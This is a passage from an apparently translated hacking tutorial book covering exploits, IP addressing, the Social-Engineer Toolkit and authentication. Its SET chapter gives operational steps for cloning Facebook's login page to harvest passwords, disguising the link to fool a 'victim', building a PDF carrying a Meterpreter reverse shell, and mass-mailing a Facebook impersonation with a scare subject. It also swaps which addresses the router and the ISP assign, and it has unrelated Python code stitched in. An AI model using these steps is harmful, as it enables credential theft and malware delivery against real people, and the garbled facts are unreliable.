Before discussing exploitation, I would like to discuss vulnerability a little. Vulnerability can be translated into Burmese as "weakness", but that alone does not yet convey what kind of weakness it is or how it arises. According to the definition of the US National Institute of Science and Technology (NIST) (in Publication 800-3, Appendix B, Page B-13), it is described as follows.
"A vulnerability is a weakness that exists in information systems, system security procedures, internal controls and so on, and that could be exploited by threat sources." Actually it is broader than that. A vulnerability arises from an error. Whether inside the information systems, through some mistake by the user, or because of some mistaken action by an administrator, errors can exist in the form of slips and mistakes made while carrying out everyday routine operations. So errors can exist in many forms in many places in systems. Vulnerabilities related to an information system can exist both inside and outside the network. An exploit is the act of seeking out such vulnerabilities and attacking them.
To give an example, suppose someone faces a minor court case. About to appear before the judge, the defendant looks for a weak point (vulnerability). Suppose he then finds out that the judge takes bribes. That is a vulnerability. Suppose that, based on that vulnerability of taking bribes, he pays a bribe. Paying the bribe is the exploit. As a result, the weaker party the judge is supposed to protect (the plaintiff) loses. It is only an example, given so that you can picture it. :)
It is just like the example above. If you want to break into a system, you have to find that system's weakness, such as whether it will grant access if bribed. To give another example that is real in today's world, suppose there is a person in an organization who is responsible for its networks. Suppose that, when that person is studied, he turns out to be someone who thinks too highly of himself (he knows everything, and everything is the way he sees it). That is also a vulnerability. The reason is that a lot of information can leak out of him just by flattering him, or by saying things he cannot stand, such as "you don't know anything".
So I think you can now see that a vulnerability can exist not only inside the system but also outside it. Exploitation is attacking on the basis of such a vulnerability. There are tools that can be used for attacking in this way. A hacker's best penetrating tool, however, is his own brain and knowledge. Every system has many doors (doors or entry points) leading into it. If you find one door closed, go and look at another door.
What you should keep in mind is that exploitation is one of the hardest phases, and a kind of talent that penetration testers exercise with the strongest desire. It takes time, knowledge and good ideas. You also need to remember and know all the attack types that can be carried out on a single attack vector, and you need to be able to use them skilfully.

Attack Vectors Vs Attack Types


There is quite a lot of confusion in this area. Some people assume that attack vector = attack type, that they are the same thing, while others know that they differ. People often mistake an attack type for an attack vector. So let's see how they differ.
An attack vector, put most simply, is the path through which an attack can take place. An attack type can be described as the method (technology) of attacking. To make it clearer, suppose a website is attacked with SQL injection. SQL injection attacks a web application through the browser. In this case the web application is the attack vector and SQL injection is the attack method. The SQL code that is written is the exploit.
If it is still not clear, here is another example. It is one that many people run into or have run into. The attacker creates a pdf file with virus code embedded in it and mails it to the target. Because it is a book the target wants to read, he downloads it at once and reads it. Suppose that, through the virus code that came with it, the virus then reaches the machine of the person who opened the pdf.
Looking back at this case, the attack vector (attack surface) is the mail and the user's system. Without them this attack could not happen. The attack type is malicious code injection, and the virus code included in the pdf is the exploit. As for the vulnerabilities it is based on, you can see weaknesses such as the pdf viewer accepting code execution, the user opening the file without checking it, and the PDF viewer not having the running of JavaScript disabled. These are the vulnerabilities. I think you roughly get the idea by now. To see it more clearly, let's look at the table below.
Attack Vectors        Attack Types
Code Injection        Buffer Overflow
                      Buffer Underrun
                      Viruses
                      Malware
Web Based             Defacement
                      Cross-Site Scripting (XSS)
                      Cross-Site Request Forgery (CSRF)
                      SQL Injection
Network Based         Denial of Service (DoS)
                      Distributed Denial of Service (DDoS)
                      Password and Sensitive Data Interception
                      Stealing or Counterfeiting Credentials
Social Engineering    Impersonation
                      Phishing
                      Spear Phishing
                      Intelligence Gathering

The table above separates Attack Vectors & Attack Types as examples. (ref: Hacking With Kali <PPTT>)
Local Exploits
Now let's turn back to exploits for a moment.
As the name says, a local exploit is carried out only from within the local network. Suppose an organization has ten devices connected to its network. It is usually done by methods such as having it carried out from one of those ten devices, or the attacker connecting to that network himself and carrying out the exploits, or plugging an auto-executable USB drive created by the attacker into one of the devices inside that network.
The usual purposes of doing this are to escalate the extent of what is permitted inside the network (system privileges), to be able to carry out DoS (or) to make the device take part in DDoS, to steal information, and to upload malicious files. Because it is a local exploit, it cannot be carried out from another network (or) from the internet. It has to be carried out inside the target's network.
For that reason, the legal users inside the target organization have to be made use of. For example, Trojan (or) backdoor files are bundled into movies (or) pdfs, or macro code is embedded in Microsoft Office (Word, Excel) files, and these are sent, with skilful use of social engineering, to someone inside the target network who has the authority to act. By opening those files, that person ends up helping the attacker. This shows how important the security knowledge of the staff who work with computers in our businesses is.

Local Exploit Searching


Because there are so many of the local exploits discussed above, choosing the right exploit can be hard at first for beginners. Rapid7's Metasploit provides a program for searching among that large number of exploits. That search program, called SearchSploit, and Metasploit are both already included in the Kali Linux we will use, so nothing needs to be installed separately. Let's try it hands-on. Type searchsploit local in the Terminal and search.
As in the picture above, you will see thousands of local exploits. There are really too many. Let's narrow it down a little and search again.

As shown above, even a search for windows returns close to a thousand exploits.

To narrow the search result further, let's add the word excel at the end and search again. The command is as shown in the picture above.

Looking at the picture above, you will see the exploits that can attack by way of Microsoft Excel. There are 17 exploits in the picture. I assume this is enough to show what can be found with the searchsploit command.

If you want to open and read an individual exploit, you can use cat, gedit or leafpad, whichever suits you, and open it by joining the two parts of the path. For example, to view an exploit from the picture above, you will see that the main path is /usr/share/exploitdb/platforms/. That means every exploit listed below it is located in there. Suppose the exploit to open is windows/local/14966.py from the picture above. Joined with the main file path it becomes /usr/share/exploitdb/platforms/windows/local/14966.py. Just type cat (or) gedit (or) leafpad in front of it.

Remote Exploit
Exploits that can be carried out against computers, network devices, mobile phones or services and so on from outside the network or operating system are called remote exploits. Some people also call them network exploits. Whatever they are called, the important point is that if it is not a local exploit, it is a remote exploit. Remote exploits are used not only against computers, servers and network equipment but against everything that is connected to a network, such as web services & applications, databases, printers and mobile phones. If you want to search for remote exploits, you can also search as follows.

Metasploit
Metasploit is a familiar word to anyone who is going to study hacking. Metasploit stands as a powerful tool for pen-testers. Describing Metasploit at length could go far beyond the size of one book, so let me give only the essentials.
Metasploit comes in two versions, Metasploit pro and Metasploit free. Security teams and government agencies usually buy and use the pro version, which includes reporting, group collaboration, compliancy checking and advanced wizards for precision & control. Because the exploit modules are the same, ordinary users like us do not need to buy it. :)
Let's look at its framework. It mainly contains 5 module types:
1. Exploit Modules
2. Auxiliary Modules
3. Payloads
4. Listeners
5. Shell code
Some people also add categories such as Armitage and speak of a 6th category. We will continue the discussion when we reach the Metasploit chapter. For now it has been discussed only as an overview.

Social Engineering Toolkit


When penetration toolkits are discussed, setoolkit (the Social Engineering Toolkit), which is well known for phishing, is already familiar to quite a few people. It is a tool that made its name both because it is easy and straightforward to use and because it performs well locally. Because it will be discussed separately in a chapter of its own, let me give only an introduction here.

What I have discussed up to this point is still only about the toolkits used for Chapter 9: Exploitation. There are also the techniques for exploiting. Of the steps in the Phases of Ethical Hacking that we discussed earlier as at least four phases, the Exploitation Phase has the most to discuss and is the broadest. For this chapter, I will stop here.

I think it is more appropriate to discuss each topic one at a time in the later parts.


CHAPTER 11: Additional Knowledge Foundation

What is IP Address?

Before discussing this topic, let me apologize: I did not originally intend to add this material here. It really should have been written earlier in the book, but I had originally planned not to include it in order to reduce the number of pages. I had left it out because it is something everyone knows, but just before writing this, some people I know asked me questions.
One asked whether there isn't just one IP address, and another said that IP addresses are confusing, with Dynamic, Static, Public and Private ones. When he asked whether Dynamic & Static and Public & Private are the same things under different names, the way two languages name the same thing differently, I thought there might be readers of this book who want to know the same thing, so I had to add these parts.
As everyone knows, an IP address (Internet Protocol address), put most simply, is our address on the internet. Everyone knows what an IP address is, but there are people who do not know that there are two kinds of IP address, or how dynamic, static, public & private differ, so let me start from there.

What is Private IP address?


I think quite a lot of people can answer this question. I find that people roughly answer that it is the IP address on the computers we use. Suppose we connect to the internet through some router. That router comes with local addresses by default, and they usually share a series according to the type of router (by manufacturer).
• Linksys routers use 192.168.1.1
• D-Link and NETGEAR routers are set to 192.168.0.1
• Cisco routers use either 192.168.10.2, 192.168.1.254 or 192.168.1.1
• Belkin and SMC routers often use 192.168.2.1
The addresses above are only examples, and addresses are issued to the local machines following the series of those numbers. Let's take an example. Suppose we are sending a letter. Suppose we write our address, No. 123, 3rd Floor, Hninsi Street, Insein Township, Yangon, in the place for the return address and send it off. When the letter we sent arrives (for example in another city or country) and they reply, they will send the reply to the address we gave, but they will not know it exactly.
For example, suppose we send a letter to the address of an acquaintance in the US. When he replies, he will send it back to the address we gave him, but what he will know is Yangon, Myanmar. That is all he will know. He will not know the rest, the streets, the house numbers and so on.
Looking back at that case, we can see that our address is split into 2 parts. For a letter from the other side to come back to us, it first arrives at the post office responsible for Yangon. Only after that does it reach us, as a second step.
So the address is split like this: the part of our address that the letter reaches in the second step is one part, and the part that is generally known is the other. To make it clearer, suppose Maung Maung, who lives in Yangon, sends a letter to Aung Aung, who lives in Taunggyi. Suppose the address Aung Aung gave is No. 24, corner of Anawrahta Road and Khwa Nyo Road, Taunggyi, Shan State. What Maung Maung in Yangon knows is that Aung Aung, the person he is writing to, is in Taunggyi. In the same way, the Yangon post office where Maung Maung posts the letter will only know that this letter has to be sent to Taunggyi. It will not know which street or which place.
So the letter will reach the Taunggyi post office. Only from the Taunggyi post office will it then reach No. 24, corner of Anawrahta Road and Khwa Nyo Road. Looking back at this case, you can make out one route address between the Yangon post office and the Taunggyi post office, and another route between the Taunggyi post office and the recipient.
Our router works like the Taunggyi post office. It takes on the duty of delivering the letters that reach it exactly to the address of the person they are meant for. So the addresses it delivers to are addresses inside its own township. That is the nature of a local address, and it is similar in nature to a private IP address.
A private IP address is an address assigned by the router, and it is a local address. The router's duties also include forwarding the data that comes in from outside to the relevant addresses. It uses the private IP address for that forwarding. That is why IP addresses cannot be the same as one another. The main point is that a private IP address (or) local address means the address of the devices that sit under the single network we are connected to. Please don't think I am being long-winded in saying this. Some people really do not know it.
If you want to know your private IP address, you can type ifconfig in the Linux Terminal and look. That has already been shown earlier. On Windows, you can type ipconfig in cmd.

What is Public IP address?


From the example just discussed, I think you can already guess what a public IP address is. When we arrive in another country, all that the people of that country know about us is that we are from Myanmar. They will not know which township or which street. What they know, that we are from Myanmar, is similar in nature to a public IP address. When we visit a website, that website does not know our private IP address. What it can know is the public IP address.
To make it clearer, let's look at the two kinds of IP address side by side.
Private IP Address                       Public IP Address
Internal IP Address                      External IP Address
Only you can see                         The world can see
LAN IP Address (Local Area Network)      WAN IP Address (Wide Area Network)
With this much, I assume that even if you did not understand before, you are now close to getting the idea. Suppose we connect to facebook.com over the internet connection we have (wifi, cables, ...). To be able to know which computer in our network is the one connecting to Facebook, it has to be noted by its internal address. Then the router, using the external (public) address, makes the onward connection to facebook.com. facebook.com sends its reply to our public address. It is like a letter arriving at the Taunggyi post office. There the router (the Taunggyi post office) forwards it exactly according to the IP address it noted. That is why, even though there are many devices in our network, the reply can come straight to us. (It is like the way there are many houses in Taunggyi, but the letter can be delivered correctly to the one house that is to receive it.)
Good. So how can we look up our public IP address? It is easy. In the address bar of the browser we normally use (on a phone or on a computer, either works), just type what is my ip address .com joined together. I have written it with spaces only so that it is easy to remember. What you have to type is whatismyipaddress.com. What do you see when you press enter? Try it.

This is what I looked up as an example. Check it in your own browsers too. You will find that it is completely different from the ip address you see with ifconfig. That is because the Public IP Address is assigned by the router and the Private IP Address is assigned by our Internet Service Provider (ISP).
When we use the internet, these two kinds of address work together. There is one more thing worth remembering, which is that the public IP address can indicate our approximate location.
whatismyipaddress.com does not only show our IP address. You will see that the map (Google Map) near the bottom also shows the approximate place where we are located.
If you want to know a location from someone's IP address, that can be looked into as well. As an example I will do an IP Lookup of the IP address of someone I know. To search directly, just put the IP address you want to know about after whatismyipaddress.com/ip/. The public IP address I am going to look up is 103.52.14.0, so when I type whatismyipaddress.com/ip/103.52.14.0 and press enter, I see the following.

Because it is shown so that everything is visible, the picture is not clear. You can try it by looking up your own public IP address as an example. I will show again what can be seen from the IP Lookup.
Looking at the lookup above, you can see the information that can be revealed from a single IP address. According to the picture, you can see that the user is using the internet with MPT, that he is in Loikaw, Kayah State, Myanmar, and at what latitude and what longitude, and when you look it up in practice you will find the approximate location shown on the map.
IP tracking of the kind shown above is used by online stores such as amazon.com and by sites with location-based restrictions such as Facebook and Google. To summarize these two parts: a private IP address is an internal (local) address that differs for each machine inside our one network, and it is an address that can only be used among the devices connected under that one network. A public IP address is simply our external address (in other words, the address that communicates with the outside).
If you study the picture above, you will see how we use the internet. The main reason we are able to get and use the internet is not the router. The main reason is the Internet Service Provider (ISP). The router helps so that the internet line from the ISP can be used on our devices. According to the picture, the router's IP address is 192.168.0.1, and you can see that the private IP addresses assigned as internal addresses also start with 192.168.0.
Here the public IP address that the ISP gives us is (according to the picture above) 82.10.250.19, and for every device inside the network in the picture the public IP address is that single address. If you want to test this, you can go to whatismyipaddress.com in the browser of every device in the network and look.
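
The router's role described above (noting which internal address opened a connection, sending it out under the one public address, and handing the reply back to the right device) can be followed in this added Python illustration, which is not from the book. The addresses 192.168.0.x and 82.10.250.19 are the ones in the book's diagram; the server address, the port numbers and the NatRouter class are constructed for the example.

```python
import ipaddress
from dataclasses import dataclass, field

PUBLIC_IP = "82.10.250.19"                     # public address from the book's diagram
LAN = ipaddress.ip_network("192.168.0.0/24")   # private range behind router 192.168.0.1
SERVER = ("203.0.113.5", 443)                  # constructed web server (documentation range)


@dataclass
class NatRouter:
    """Toy model of the 'Taunggyi post office': one public address, many private ones."""
    public_ip: str
    lan: ipaddress.IPv4Network
    next_port: int = 40000                     # constructed first public-side port
    # public port -> (private ip, private port, remote ip, remote port)
    table: dict = field(default_factory=dict)

    def outbound(self, src_ip, src_port, dst_ip, dst_port):
        """Rewrite a packet leaving the LAN and remember which device sent it."""
        if ipaddress.ip_address(src_ip) not in self.lan:
            raise ValueError(f"{src_ip} is not a device on this LAN")
        flow = (src_ip, src_port, dst_ip, dst_port)
        for public_port, known in self.table.items():
            if known == flow:                  # same conversation: reuse the mapping
                return (self.public_ip, public_port, dst_ip, dst_port)
        public_port = self.next_port
        self.next_port += 1
        self.table[public_port] = flow
        return (self.public_ip, public_port, dst_ip, dst_port)

    def inbound(self, src_ip, src_port, dst_ip, dst_port):
        """Hand a reply to the private address that opened the flow, or drop it (None)."""
        flow = self.table.get(dst_port)
        if dst_ip != self.public_ip or flow is None:
            return None
        private_ip, private_port, remote_ip, remote_port = flow
        if (src_ip, src_port) != (remote_ip, remote_port):
            return None                        # not a reply to anything we sent
        return (src_ip, src_port, private_ip, private_port)


def demo():
    """Two devices visit the same site; the site sees one address, replies still separate."""
    router = NatRouter(PUBLIC_IP, LAN)
    a = router.outbound("192.168.0.10", 51000, *SERVER)
    b = router.outbound("192.168.0.11", 51000, *SERVER)
    reply_a = router.inbound(*SERVER, a[0], a[1])
    reply_b = router.inbound(*SERVER, b[0], b[1])
    # A packet from an unrelated host to a mapped port is not delivered.
    stray = router.inbound("198.51.100.7", 4444, PUBLIC_IP, b[1])
    return a, b, reply_a, reply_b, stray


if __name__ == "__main__":
    for item in demo():
        print(item)
```

The website only ever sees 82.10.250.19, which is why every device on the network gets the same answer from an address lookup site, while the table inside the router is what keeps the private addresses apart.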

Why do people want to know our IP address and who know our IPs?
I will answer the first part of the question first. Most of the reasons people want to know our public IP address come down to wanting to know our location. For example, for big online shops where you pay only when the goods arrive, knowing the location becomes important (because dishonest people tend to cause trouble on purpose). To make it clearer, suppose a customer who orders saying he is in MDY turns out, by IP location, to be not in MDY but in YGN. That is a kind of lying, so it can be seen that this customer is not being honest. The other thing is the address.
An example was shown earlier: an IP lookup can show the approximate location. (In Myanmar the streets are accurate only for the big cities. In small towns the street names are not yet correct, and even in the big cities there are streets that are not included yet.)
The second part of the question is who can know our IP address. Because the IP address has two parts, I will describe them one at a time. The private IP (local IP address) can be known only by users on the same network who know about IP addresses. It is not easy for anyone else to find out your private IP address. That is why people try to get access to the same network. If your target is someone who regularly uses public Wifi, getting same network access will no longer be difficult for you.
As for the public IP address, there are many who can know it. Suppose you post a letter at the post office. For a reply to be able to reach you, you have to include your own address. It is the same idea. When you open some content from a website, you make a request to that website for the content you want to see. You then receive the data that the site sends back to your public IP. That is why every website you use can know your IP address.
Next, the one that can always know your public IP is the ISP you use. For example, if you only use a phone SIM card, your ISP is one of (MPT, Telenor, Ooredoo, MEC, ...). Are they the only ones who will know? Not quite. For example, when you try to recover someone else's gmail (or) Facebook account by way of forgot password, your IP address will also reach the owner of that account as a report.
Besides these, your public IP address can also become known when you lend out your computer, when we let someone else use our network, through the admins of the social media we use such as Facebook, or by clicking on links that were created for IP tracking, and so on.
Static Vs Dynamic IP addresses
Now I will discuss Static and Dynamic IP addresses a little. As everyone knows, a Static IP is fixed. Because it does not change, a Static IP address as a Public IP address is quite a bad thing. A Dynamic IP address changes in rotation from one time to the next, so between the first time you turn on the internet and the next time you turn it on, apart from the IP class being the same, the IP address will have changed completely. So for people using a phone, if you restart the phone, or turn the internet connection off and on again, and then look at whatismyipaddress.com, you will see that it has changed. For the most part, ISPs use Dynamic IP addresses.
So if you want to change your public IP address quickly, just reboot the phone. Once it comes back on, you will find that your public IP address has changed. Static IP addresses are usually found among private IP addresses, which are local addresses. For them, as long as the machine is in this network, it keeps this number. It changes only when the machine is moved to and used on another network.

How to hide our IP addresses


There are four ways to hide our IP address.
• Use a VPN Service
• Use Tor
• Use a Proxy Server
• Use Free/Public WiFi
I will not go into the details. With the four methods above we can keep our public IP address concealed.
Everything presented here about IP addresses relies on the articles from what is my ip address .com.

Network Types
Based on the area of use, there are three network types. I think most people already know them. So I will go through them briefly for the few who do not yet know.
1. LAN (Local Area Network)
This is a type of computer network in which computers are connected to one another and used in places such as offices, schools and universities, and supermarkets. It can be used only within a limited area. It can be connected using cables or wifi, and data can be shared without needing the internet. (It is internal only.)

2. MAN (Metropolitan Area Network)

This one is larger and wider than a LAN. Since metropolitan refers to a city, it is easy to remember as a network the size of a city. It is a network that is not yet large enough to connect to every part of the world.

3. WAN (Wide Area Network)

This is the widest network, and it contains many LAN and MAN networks. The internet (International Network) that we use today is also a WAN network.

What do we Attack/hack
Looking at what we target when hacking, you can make out the main divisions: accounts (e.g. gmail, facebook, ...), which people try to steal by phishing, access stealing and so on; the web (sites & applications); and systems, where a system is broken into in order to get at information. So the later chapters will continue with exploits & attacks. What you should note is that, although they are not under the Exploitation heading, they are exploitation too. I hope it goes well for everyone.
CHAPTER 12: Social Engineering & Toolkit

Introduction

From the name alone it is easy to tell that the Social Engineering Toolkit is a toolkit used by social engineers. Social engineering is old, but it is a method that is still being used successfully today. At a time like the present, when social media is ever more widespread, it is no surprise that social engineering (SE) can be used more widely.
Put simply, SE is asking for information by deceiving people in all sorts of ways, in order to find out what you want to know. In some places what you want to know can be obtained just by talking, but in some areas talking alone will not get it. Then other kinds of support become necessary. Social engineering also exists in fields that have nothing to do with computers. This book will only cover what is relevant.
The first thing we have to study is the Social Engineering Toolkit. Although it is built in to Kali Linux, it is sometimes missing after an error has occurred. If it is missing, it can be installed easily. Open the Terminal and do the following.
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set
python setup.py install

It can be installed easily as shown above. To find out whether it needs to be installed, open the Terminal and type setoolkit. If you see bash: setoolkit : command not found, it needs to be installed; if it goes to set> (the setoolkit main menu), or asks Y/n (yes or no) as it does for first-time users, there is no need to install it again. If it asks Y/n, just type y and press enter and you will arrive at the Main Menu. Let's try it hands-on.
Main Menu of setoolkit

In the main menu of setoolkit you will see what is shown above, with 6 options to choose from. Although there are 6 menu options, you will see that 4) is Update the Social-Engineer Toolkit, which is for upgrading when a new version comes out, 5) is for updating the SET configuration and 6) is the help option, so the main things to study are only 1, 2 and 3.
Each of them also has its own sub-menus, so studying the whole of setoolkit will take quite some time. Let's look at the main menu again. Of the three parts we have to study, the first is Social-Engineering Attacks. 2 is Penetration Testing (Fast-Track), and the third is Third Party Modules.
I will go through them one at a time. First, to work with Menu 1) Social-Engineering Attacks, type setoolkit in the Terminal and open it. If it is already open, there is no need to open it again.
To begin with, choose 1 and continue. According to the menu, 1 is Social-Engineering Attacks. You can see it in the picture above. (Just type 1 after the set> that appears and press enter.)
When 1 is chosen from the main menu, you arrive at the second menu as shown above. You will find options 1 to 11, and because I want to present one attack through to the end as an example here, I will choose 2) Website Attack Vectors. It is option 2, so type 2 and press enter.

Now you will see set:webattack in the terminal. In the menu you will also see the methods included in the website attack vector. In this example I will demonstrate 3) Credential Harvester Attack Method. Type 3 and press enter.
You will see the following options.
Of 1) Web Templates, 2) Site Cloner and 3) Custom Import, I will choose 2) Site Cloner as the example.

What appears is a prompt to fill in an IP address. We have to fill in our own IP address. As in the picture above, fill in your own IP address and press enter. If you do not know your IP address, open another terminal and type ifconfig to find it. Once the IP address has been filled in, press enter.

Now we have to enter the website to be cloned. Here I will use Facebook as the example.

When www.facebook.com is entered as shown above and enter is pressed, the cloning progress is shown in yellow text. Once lines of red text and blue text appear, it is ready.

Because the page has to be opened by IP address, go to goo.gl in a browser to turn the IP address into a link, so that your victim does not easily become suspicious.
As in the picture above, type http://your-IP_Address in the SHORTEN field. (The IP address must be entered exactly as it was entered in the web attack earlier.) Then click shorten URL, or just press enter.
I demonstrated with 192.168.10.150, so I typed http://192.168.10.150 and pressed SHORTEN.

I copied the resulting link and sent it to another user (my victim) who was on the same network. Once the victim opens it, they will see the fake Facebook login page as shown above.


At this point, if the victim fills in the user name and password there and logs in, they end up at the real Facebook, so they may not notice anything. The details entered at that login can be seen in the Terminal. (You do need to be able to draw your prey into wanting to log in. Think that part through yourself ;)
You will see that the email is test-only@gmail.com and the password is thisismytesting. To avoid this kind of attack, check URLs carefully. If you do not know how to check URLs, then on the first attempt fill in something made up that has nothing to do with you; that gets you past the phishing stage.
For example, enter abcdef as the user and ghijkl as the password and log in. You will arrive at the real Facebook login page. Other logins behave the same way. For Facebook there is one more method. Choosing English in the language switcher at the bottom of the page in the browser also takes you from the phishing URL to the real URL.
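The URL check recommended above, written out as an added Python example (not from the book). The finding names, the shortener list and the sample URLs other than http://192.168.10.150 are constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed, non-exhaustive list of link-shortening hosts. A shortened link hides
# the real destination, so it has to be expanded before the target is judged.
SHORTENERS = {"goo.gl", "bit.ly", "tinyurl.com", "t.co"}


def assess_login_url(url, expected_domain):
    """Return the reasons a link should not be trusted as a login page for
    expected_domain. An empty list means none of these checks fired."""
    if "://" not in url:
        url = "http://" + url  # a bare host typed into a browser defaults to http
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    findings = []

    # Credentials must only ever be submitted over TLS.
    if parts.scheme != "https":
        findings.append("not-https")

    # "https://facebook.com@203.0.113.5/" puts the trusted name in the userinfo
    # part; the browser actually connects to whatever follows the "@".
    if parts.username is not None:
        findings.append("userinfo-in-url")

    # A real public login page is served from a domain name, not a raw IP.
    try:
        ipaddress.ip_address(host)
        findings.append("ip-literal-host")
    except ValueError:
        pass

    if host in SHORTENERS:
        findings.append("link-shortener")

    # Punycode labels can render as look-alike characters in the address bar.
    if any(label.startswith("xn--") for label in host.split(".")):
        findings.append("punycode-host")

    # The host must be the expected domain or one of its subdomains.
    # "www.facebook.com.login.example.net" merely starts with the trusted name.
    expected = expected_domain.lower()
    if host != expected and not host.endswith("." + expected):
        findings.append("host-mismatch")

    return findings


if __name__ == "__main__":
    samples = [
        "http://192.168.10.150",                        # address used on this page
        "https://goo.gl/AbCdEf",                        # constructed
        "https://www.facebook.com.login.example.net/",  # constructed
        "https://www.facebook.com/login.php",
    ]
    for sample in samples:
        print(sample, "->", assess_login_url(sample, "facebook.com") or "no findings")
```
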
Attacks of the kind shown here (attacks that have to be built with an IP address) can only be used within the same network. If you want to use them over WAN, you will need to go on and study port forwarding. Let's continue the discussion.

1) Social-Engineering Attacks
Above I have already shown one attack step by step as an example, so I assume you will understand it if you follow along and try it. Once you understand those steps, studying the menus one by one is no longer difficult. Now let's study the first menu. Enter Social-Engineering Attacks.
To enter the first option, 1) Spear-Phishing Attack Vectors, type 1 and press enter. (Since all you have to do is type the number you want to use, from here on I will not mention typing the number again.) Let me say a little about spear-phishing here.
Spear phishing is an email or electronic communications scam
targeted towards a specific individual, organization or business. Although
often intended to steal data for malicious purposes, Cyber-criminals may also
intend to install malware on a targeted user’s computer.
The description above was copied from Kaspersky's Resource Center. Spear-phishing can be described as a kind of email (or) electronic communication (an illegal pursuit of gain) that is sent with a specific individual, or an organization (or) a business, as its target. Although it is aimed at stealing data for malicious purposes, cyber-criminals also try to install malware on the target's computer.
Most often, hackers backed by a government and other major hackers are the ones behind this attack. Cyber-criminals also commonly do this and try to resell the valuable data among what they obtain to governments (or) other companies. An example would be selling to a rival company the details of a project (or) a contract that our company intends to carry out soon.
If these attacks are crafted at a high level they are extremely hard to detect, so defending against them is hard. Let's pause the discussion and look at how it works in practice. For the spear-phishing attack in setoolkit, you will see the methods to choose from as follows.

The first one is Mass Email Attack. In Mass Email Attack you will find that there are 22 options.
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
7) Adobe Flash Player "Button" Remote Code Execution
8) Adobe CoolType SING Table "uniqueName" Overflow
9) Adobe Flash Player "newfunction" Invalid Pointer Use
10) Adobe Collab.collectEmailInfo Buffer Overflow
11) Adobe Collab.getIcon Buffer Overflow
12) Adobe JBIG2Decode Memory Corruption Exploit
13) Adobe PDF Embedded EXE Social Engineering
14) Adobe util.printf() Buffer Overflow
15) Custom EXE to VBA (sent via RAR) (RAR required)
16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
17) Adobe PDF Embedded EXE Social Engineering (NOJS)
18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
19) Apple QuickTime PICT PnSize Buffer Overflow
20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
21) Adobe Reader u3D Memory Corruption Vulnerability
22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
I will demonstrate 17) Adobe PDF Embedded EXE Social Engineering (NOJS). Choose 17.
You will then see a further menu as in the picture above. Here I will demonstrate 1. Use your own PDF for attack.
It will ask for the file name and path as follows.
Because I am going to use a file called test.pdf on the Desktop (a pdf file that I renamed), I typed Desktop/test.pdf.

At this step I chose 2) Windows Meterpreter Reverse_TCP.
You have to enter your own IP address.
The next step is to enter the port for the connection back.
default port = 443, and
I entered 2960.
After the port is entered, wait a moment while the payload is generated. Then it will ask as in the picture above. 1 keeps the current file name; 2 renames the file. I chose 2.
When it asked for the new file name I gave for-victim.pdf. That is because 17), which I chose earlier, is for pdf. After that, the file we created can be found in the Home Directory.

Because the created file is in a hidden folder called .set, it only appears once you open Files and tick Show Hidden Files in the menu. You can see this in the picture above. When the .set folder appears, open it and you can get the file that was created earlier.
The for-victim.pdf file created in the example earlier can be seen in the .set folder, as in the picture above.
Social Engineering >> Mass Mailer Attack
Now let's try the Mass Mailer Attack under Social Engineering.
As shown above, I chose and entered 5) Mass Mailer Attack.
Because I want to attack only a single mail address, I chose 1.
We have to fill in the mail address we are targeting. I am only showing an example, so please don't send any back to me :)
At this step, because I do not have my own mail server yet, I simply chose 1.
The next step is to enter our gmail. Enter the gmail address you opened, correctly. My suggestion is to open a new account and use that.

The next step is the name you want displayed when the gmail we send reaches the target. To get the recipient interested, I gave the name Facebook. In other words, it looks as if Facebook sent it.
When that is done and you press enter, it will ask for the gmail password. Enter the password of the account entered earlier. Because the characters are not shown while you type the password, you need to type carefully so that you make no mistake. If you get it wrong here, you have to start again from the beginning.
I will not explain the steps above.

This step is important, because it asks for the subject of the mail. Since I want my target to open and read the mail, I entered the heading Warning for your account, as a slight scare that pushes them to read it. (In Burmese this is what we call the subject.)
Here I am going to use plain, so I just continued with p.
This step is the body of the mail we are going to send.
The text Next line of the body: will not be included in the mail that is sent. It is only there to let you know that you are writing the next line. You can write whatever you like there. When you have finished, write END on the next line, all in capital letters, and press Enter. That END is also not included in the mail that is sent.
After that, our mail has been sent to the victim.
Note: because this involves sending mail, I will not bother to say that the internet has to be switched on to carry out these steps.

Conclusion
In this chapter I have described and discussed, in overview, the basic points you should know. Just by looking at the menus you can tell that describing all of Setoolkit without leaving anything out would fill a large book of its own.
So, on the assumption that you can go on and try out the other things in setoolkit for yourselves, let me stop here. The remaining ways of using Setoolkit will continue to be presented in the Facebook Group, so by just filling in and sending the Member Form included in this book you will be able to continue studying as a member of the Facebook Group.
CHAPTER 13: Authentication System

Introduction

When we log in to a computer system, we have to enter information such as a user name & password so that the system can tell whether we are genuine or not. This is called Authentication.
In authentication, other things besides user name & password can in fact also be added as further security layers. For example, fingerprint systems, or the Login Approval (2 steps verification) that everyone knows. To carry out an authentication process, a database system is needed that stores the user names, passwords and so on. That data is usually stored not as plain text but as hashed texts.
That database can be stored in the local system, as in a workgroup environment, and when an Active Directory is used it can also be stored on some server. Keeping and using this information in the local system makes it weaker in terms of trustworthiness. The reason is that it becomes easy to dump the database system and crack the passwords offline.
In addition, it is because Microsoft systems use only hash algorithms with weak security when storing passwords in the local computer database. That database is called the SAM database.
The basic form used for authentication is the use of a user name & password. We have come across authentication protected by PINs and patterns, and we likewise know of technologies designed to authenticate in other forms. But what we use most today is still the One Factor Authentication method.
If Multi-factor authentication is to be used, other technologies also have to be considered. For example, authenticating with smart cards in addition to passwords. (You have probably seen this in foreign films.)
Smart cards contain a magnetic field that can identify the card holder. So if a user name, a password and a smart card are used, that is multi-layer authentication. Even if someone learns your user name & password, duplicating the card is not convenient, so it gives more assurance and security. It is just like the way we use our Facebook and gmail accounts with Login Approval turned on.
Besides these, methods such as fingerprint, eye scanners and voice recognition can also be used. Using token generators, a One Time Password, called OTP, can also be used. The codes sent when you log in to Facebook & Gmail are also a kind of OTP, because you can use them only once.
Multi-factor authentication is usually thought of in 3 categories. They are:
